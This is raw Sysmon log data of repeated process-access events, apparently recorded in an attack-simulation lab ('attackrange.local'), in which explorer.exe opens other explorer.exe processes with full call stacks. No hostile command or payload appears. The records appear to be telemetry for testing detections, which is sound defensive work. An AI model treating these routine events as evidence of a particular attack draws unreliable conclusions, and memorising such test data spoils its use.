16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246385Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246384Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246383Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246382Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246381Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246380Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246379Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246378Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246377Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246376Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246375Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246374Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246373Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246372Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246371Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246370Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246369Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246368Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246367Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246366Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246365Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 